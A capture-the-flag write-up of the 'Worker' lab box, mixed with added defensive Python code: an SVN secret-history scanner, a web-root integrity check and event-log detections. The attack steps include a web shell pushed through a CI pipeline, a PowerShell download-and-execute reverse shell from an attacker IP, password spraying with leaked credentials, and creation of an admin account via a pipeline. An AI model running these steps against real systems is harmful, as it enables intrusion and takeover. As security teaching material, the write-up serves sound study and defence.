Service overview

$ nmapAutomator.sh -H 10.10.10.203 -t Full

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

SVN

$ svn ls svn://10.10.10.203:3690
$ svn checkout svn://10.10.10.203:3690
$ cat moved.txt
http://devops.worker.htb

Parsing subdomains:

$ curl -s http://dimension.worker.htb/#work | grep -oh 'http://.*worker.htb'
http://alpha.worker.htb
http://cartoon.worker.htb
http://lens.worker.htb
http://solid-state.worker.htb
http://spectral.worker.htb
http://story.worker.htb
$ svn log
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 16:52:00 +0300 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 16:50:20 +0300 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 16:46:19 +0300 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 16:45:16 +0300 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 16:43:43 +0300 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------


$ svn up -r3
$ cat deploy.ps1
$user = "nathen"
# NOTE: We cant have my password here!!!
$plain = ""
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")


$ svn up -r2
$ cat deploy.ps1

$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

=> http://devops.worker.htb/ekenas/
nathen:wendel98
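The r2 -> r3 history above is the classic case of a secret "removed" from a deployment script but still retrievable from version control. The following is an added example (not part of the original writeup, and not a tool from the box) of a defender-side history scan: it walks every revision of a file rather than only the working copy and reports literals that were scrubbed later but remain in history. The HISTORY dict is a constructed snapshot modelled on the two `svn up` outputs above; in practice it would be filled from `svn cat -r N deploy.ps1` for each revision listed by `svn log`. The variable-name heuristic (plain, pass, pwd, secret, token, key) is my own choice.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed snapshots of deploy.ps1 per revision, modelled on the
# `svn up -r2` / `svn up -r3` output above (r1 is not reproduced on the page).
HISTORY: Dict[int, str] = {
    2: '$user = "nathen"\n'
       '$plain = "wendel98"\n'
       '$pwd = ($plain | ConvertTo-SecureString)\n',
    3: '$user = "nathen"\n'
       '# NOTE: We cant have my password here!!!\n'
       '$plain = ""\n'
       '$pwd = ($plain | ConvertTo-SecureString)\n',
}

# A PowerShell variable whose name hints at a secret, assigned a non-empty
# string literal. Piped expressions like `($plain | ConvertTo-SecureString)`
# and empty strings deliberately do not match.
SECRET_ASSIGNMENT = re.compile(
    r'^\s*\$(?P<name>\w*(?:plain|pass|pwd|secret|token|key)\w*)\s*=\s*'
    r'(["\'])(?P<value>[^"\']+)\2',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    revision: int
    line: int
    name: str
    value: str


def scan_revision(revision: int, content: str) -> List[Finding]:
    """Return every secret-looking literal assignment in one revision of the file."""
    findings = []
    for lineno, text in enumerate(content.splitlines(), start=1):
        match = SECRET_ASSIGNMENT.match(text)
        if match:
            findings.append(Finding(revision, lineno, match.group("name"), match.group("value")))
    return findings


def scan_history(history: Dict[int, str]) -> List[Finding]:
    """Scan every revision, oldest first, not just the checked-out working copy."""
    return [f for rev in sorted(history) for f in scan_revision(rev, history[rev])]


def still_exposed(history: Dict[int, str]) -> List[Finding]:
    """Secrets scrubbed from the latest revision that remain in an earlier one.

    Blanking the literal in a later commit (r3 here) does not remove it:
    `svn up -r2` still returns it, so the credential has to be rotated.
    """
    latest = max(history)
    live = {f.value for f in scan_revision(latest, history[latest])}
    return [f for f in scan_history(history) if f.value not in live]


if __name__ == "__main__":
    for f in still_exposed(HISTORY):
        print(f"r{f.revision} line {f.line}: ${f.name} holds a secret that was only blanked later")
```

Running it against the two revisions reports r2 line 2 (`$plain`) as still exposed, while the r3 snapshot on its own is clean, which is exactly why scanning only HEAD gives a false sense of safety.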

Pipelines

We cannot modify the pipelines, but we can view them.

spectral CI => uploads the build output to w:\sites\$(Build.Repository.Name).worker.htb => w:\sites\spectral.worker.htb (write access)

Git

git clone http://nathen:wendel98@devops.worker.htb/ekenas/SmartHotel360/_git/spectral
cd spectral
git checkout -b shell
cp /usr/share/webshells/aspx/cmdasp.aspx .
git add cmdasp.aspx
git commit -m "added"
git push -u origin shell

Go to pull requests => create a new pull request => approve it => run the spectral CI pipeline => http://spectral.worker.htb/cmdasp.aspx

nc -lnvp 1234
python3 -m http.server 80
> powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.6/shell.ps1')"
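The pipeline deploys whatever the branch contains straight into the IIS site root, so a file that was never in the reviewed release ends up served by the web server. As an added example (my code, not something from the box or the writeup), here is a manifest-based integrity check a defender can run against a deployed site root: it hashes every file, diffs against the manifest recorded for the approved release, and separately flags new or changed server-executable content (.aspx and friends), which is what a pushed web shell looks like from the file system. The two manifests at the bottom are constructed placeholders, not the real site contents.

```python
import hashlib
from pathlib import Path
from typing import Dict, List

# File types IIS hands to a server-side handler. A new or changed file with one
# of these suffixes is a different class of event from an edited stylesheet.
SERVER_EXECUTABLE = {".aspx", ".ashx", ".asmx", ".asax", ".config", ".dll", ".ps1"}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(root: Path) -> Dict[str, str]:
    """Map every file under `root` (relative POSIX path) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): sha256_hex(p.read_bytes())
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_manifest(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare a deployed site root against the manifest of the approved release."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    # Anything new or altered that the server will execute gets its own bucket.
    suspicious = sorted(
        p for p in added + modified if Path(p).suffix.lower() in SERVER_EXECUTABLE
    )
    return {"added": added, "removed": removed, "modified": modified, "suspicious": suspicious}


# Constructed manifests: the approved release, and the site root after an
# unreviewed branch was deployed on top of it. Contents are placeholders.
APPROVED_RELEASE = {
    "index.html": sha256_hex(b"<html><body>spectral</body></html>"),
    "assets/style.css": sha256_hex(b"body { color: black; }"),
}
AFTER_DEPLOY = dict(APPROVED_RELEASE)
AFTER_DEPLOY["assets/style.css"] = sha256_hex(b"body { color: white; }")
AFTER_DEPLOY["cmdasp.aspx"] = sha256_hex(b'<%@ Page Language="C#" %> placeholder')


def demo() -> Dict[str, List[str]]:
    """Diff the constructed manifests; with a real site use build_manifest(Path(...))."""
    return diff_manifest(APPROVED_RELEASE, AFTER_DEPLOY)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:10s} {paths}")
```

The manifest for the approved release should be produced by the pipeline from the reviewed commit and stored outside the agent's reach; the check then runs on the web server on a schedule or on a file-change trigger. A modified stylesheet is worth a ticket, a new .aspx is worth a page.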

Brute force

W:\svnrepos\www\conf> type passwd
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

=> put the users in users.txt and the passwords in passwords.txt => crackmapexec (cme)

cme winrm -u users.txt -p passwords.txt --no-bruteforce

=> robisl:wolves11

User flag

evil-winrm -i 10.10.10.203 -u robisl -p wolves11
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir
    Directory: C:\Users\robisl\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/2/2021  12:33 PM             34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::ecaf:aa9d:8b8e:c46a
   Link-local IPv6 Address . . . . . : fe80::ecaf:aa9d:8b8e:c46a%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.203
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
43c018b7ce295eb71cbfd2cf25b7ab3c

Privilege escalation

Log in to devops as robisl:wolves11 => the user is an admin and can create pipelines.

Create a pipeline (basic) => empty pipeline => add a PowerShell script:

net user cube Password123! /add ; net localgroup administrators cube /add
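Both the credential check in the "Brute force" section and the pipeline step above leave a clear trail in the Windows Security log: a burst of failed network logons (event 4625) for many different usernames from one source, and a user account creation (4720) followed within seconds by a membership change to Administrators (4732) performed by the build agent's account. This added example (my code, not from the writeup or the box) shows both detections over constructed, heavily simplified event lines; real 4732 events carry the member SID rather than a name, and `agent_svc` is a placeholder for whatever account the pipeline agent runs as. Thresholds and windows are assumptions to tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Any, Dict, List, Tuple

# Constructed, simplified renderings of Security events (not a real export):
# 4625 = failed logon, 4624 = successful logon, 4720 = user account created,
# 4732 = member added to a security-enabled local group.
SAMPLE_EVENTS = """\
2021-06-02T12:40:01 id=4625 user=nichin src=10.10.14.6 logon_type=3
2021-06-02T12:40:01 id=4625 user=noahip src=10.10.14.6 logon_type=3
2021-06-02T12:40:02 id=4625 user=oakhol src=10.10.14.6 logon_type=3
2021-06-02T12:40:02 id=4625 user=owehol src=10.10.14.6 logon_type=3
2021-06-02T12:40:03 id=4625 user=paihol src=10.10.14.6 logon_type=3
2021-06-02T12:40:03 id=4624 user=robisl src=10.10.14.6 logon_type=3
2021-06-02T12:55:10 id=4720 user=cube subject=agent_svc
2021-06-02T12:55:10 id=4732 user=cube group=Administrators subject=agent_svc
2021-06-02T09:00:00 id=4625 user=nathen src=10.10.10.50 logon_type=3
"""

Event = Dict[str, Any]


def parse_events(text: str) -> List[Event]:
    """Parse `<iso timestamp> key=value ...` lines into dicts with a datetime `ts`."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, *fields = line.split()
        ev: Event = {"ts": datetime.fromisoformat(ts)}
        ev.update(f.split("=", 1) for f in fields)
        events.append(ev)
    return events


def detect_spraying(events: List[Event], window: timedelta = timedelta(minutes=5),
                    min_users: int = 4) -> List[Tuple[str, List[str]]]:
    """One source failing against `min_users` distinct accounts inside `window`.

    Per-account lockout counters never fire on this pattern (one attempt each),
    so the correlation has to be keyed on the source, not the target account.
    """
    by_src: Dict[str, List[Event]] = defaultdict(list)
    for ev in events:
        if ev.get("id") == "4625":
            by_src[ev["src"]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            users = {e["user"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(users) >= min_users:
                alerts.append((src, sorted(users)))
                break  # one alert per source is enough
    return alerts


def detect_admin_creation(events: List[Event],
                          window: timedelta = timedelta(minutes=2)) -> List[Dict[str, str]]:
    """A 4720 followed by a 4732 into Administrators for the same account within `window`."""
    created = [e for e in events if e.get("id") == "4720"]
    alerts = []
    for e in events:
        if e.get("id") != "4732" or e.get("group") != "Administrators":
            continue
        for c in created:
            if c["user"] == e["user"] and timedelta(0) <= e["ts"] - c["ts"] <= window:
                alerts.append({"account": e["user"], "by": e.get("subject", "?"),
                               "at": e["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for src, users in detect_spraying(evs):
        print(f"possible spraying from {src}: {users}")
    for a in detect_admin_creation(evs):
        print(f"new local admin {a['account']} created by {a['by']} at {a['at']}")
```

On the sample, the first rule fires for 10.10.14.6 (five accounts in two seconds) and stays quiet for the single failure from 10.10.10.50; the second fires for `cube`. In a real deployment the second alert should also be enriched with the subject: a build-agent service account creating local administrators is not a normal pipeline outcome, and the pipeline definition that ran at that time is the artifact to pull.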

Root flag

evil-winrm -i 10.10.10.203 -u cube -p Password123!
*Evil-WinRM* PS C:\users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::ecaf:aa9d:8b8e:c46a
   Link-local IPv6 Address . . . . . : fe80::ecaf:aa9d:8b8e:c46a%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.203
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
*Evil-WinRM* PS C:\users\Administrator\Desktop> type root.txt
953e1b038f1f8a9d978b2b630b122d15